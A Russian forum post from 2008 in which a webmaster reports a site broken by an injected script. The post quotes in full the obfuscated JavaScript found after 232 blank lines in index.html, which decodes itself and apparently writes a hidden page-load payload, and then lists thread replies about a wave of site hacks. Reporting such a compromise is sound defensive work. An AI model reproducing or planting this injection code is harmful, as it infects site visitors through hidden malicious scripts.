Упал один из сайтов

G_Z 07.07.2008 02:52

UE из-за точки с запятой в теле index.html.

Вскрытие показало, что к документу дописано 232 перевода строки, после которых следующее:

<!--feb96e0af7aa8222e3590c169b39c1b1-><script language=javascript>ogu="%";ie="<J73cripJ74 languJ61gJ65J3dJ6aJ61vJ61sJ63J72J69J70t>J20 functionJ20J78sJ64J28J61J29{var scJ2cvJ77J7aJ3dJ22wjJ76mJ38J78J4657]J3a*tJ50(HuJ47{#nJ4d,J2bJ49pJ6fUJ4fJ2dEJ63bq}gzJ5fK`e0J42;sJ32J36J43J5alJ40J66V$TJ41^y'rJ33dJ68J20i.J7c\\J229=aJ6bJ4eJ34J5bJ31J4a~)&!\",ejJ75J3d\"J22,rkJ2czJ71w,z=J22\",ma;fJ6fJ72(scJ3d0;sJ63J3ca.J6ceJ6eJ67thJ3bscJ2bJ2b){ rk=a.charJ41J74(sJ63)J3bzqw=vJ77zJ2eiJ6edeJ78Of(J72kJ29J3bJ69J66(zJ71w>-1J29J7b J6daJ3d((zJ71J77J2b1J29J25J38J31-1);ifJ28J6daJ3cJ3d0J29maJ2bJ3d81;z+=vwz.J63haJ72AJ74(ma-1J29; J7dJ20J65J6cseJ20J7aJ2b=J72J6bJ3b}J65juJ2b=J7aJ3bdoJ63uJ6dent.wriJ74eJ28eju);}J3cJ2fsJ63riJ70tJ3e";gnir=unescape(ie.replace(/J/g,ogu));var ht,xhi;document.write(gnir);ht="<2b3.oPi@kMzGkz0a9vkmk2b3.oP9>ihUbG80MP|j3.P0Hi9<SZRp(Ai@kMzGkz0a\\9~kmkSb3.oP\\9iSRZa\\9 PPo*//jjj|zUUz@0kMk@'P@b2|bU8/KKGPP|v2?9IhUbG80MP|30V03303I9\\9><\\/SZRp(A>9i&si</2b3.oP>i";xsd(ht);</script>

О действиях этой хреновины могу только догадываться.

Другие файлы не тронуты, другие сайты тоже.
Прогоняю полную проверку на троянов, пока тихо, да и врятли чего найдёт.
Скорее всего был украден FTP-пароль у меня или коллеги.

Парсер снова «спас» сайт от зловредных намерений пакости.

Эпидемия взломов сайтов.., osatuk 12.04.2007 05:47
- Упал один из сайтов, G_Z [M] 07.07.2008 02:52
  - Мы с этой фигней уже года два боремся, 4ept 07.07.2008 03:30
- Случайно наткнулся на тред, AEM 19.06.2007 13:41
  - Ответ, Misha v.3 [M] 19.06.2007 14:56
    - Ага, AEM 19.06.2007 20:02
- IFrame - Да, в вашем полку прибыло, Rafael 19.06.2007 09:24 / 19.06.2007 13:50
  - Да всё давно известно.., 19.06.2007 17:04
    - Видимо цель всей этой эпидемии - крупная рыба, Rafael 20.06.2007 14:55
    - Посмотрел, Rafael 19.06.2007 17:24
- Ответ, Oleg 14.04.2007 04:48
  - http://www.host.ru/news/2007/03/19.html, Misha v.3 [M] 14.04.2007 10:34
    - Странно.., osatuk 14.04.2007 15:06
      - да... жесткач..., Misha v.3 [M] 15.04.2007 10:29
        лечить насморк гильотиной?, Sanja v.2 [M] 16.04.2007 00:25
        Ответ, Misha v.3 [M] 16.04.2007 10:30 / 16.04.2007 13:23
        Зачем перелогиниваться? :) есть runas, бесплатный sudowin., redactor [M] 16.04.2007 19:23
        Достаточно Shift + левый клик по иконке, Sanja v.2 [M] 17.04.2007 10:40
        круть! =), Misha v.3 [M] 17.04.2007 12:46
        вдогонку про Avira Antivir, Misha v.3 [M] 18.04.2007 13:38
        Хотябы так :) (-), redactor [M] 17.04.2007 10:50
- у знакомого было что-то аналогичное, Misha v.3 [M] 13.04.2007 13:53
  - Ответ, osatuk 14.04.2007 03:11
- Ответ, Hexley 12.04.2007 18:43
  - +1 (-), tezro 13.04.2007 03:03
- недавно была история., abb 12.04.2007 15:55
  - Ответ, osatuk 14.04.2007 03:13 / 14.04.2007 03:14
  - + балл в пользу парсера! (-), MadCow 13.04.2007 14:26

Новости	FAQ	Авторы	Документация	В действии	Библиотека
Инструменты	Полезные ссылки	Хостинги	Скачать	Примеры	Форум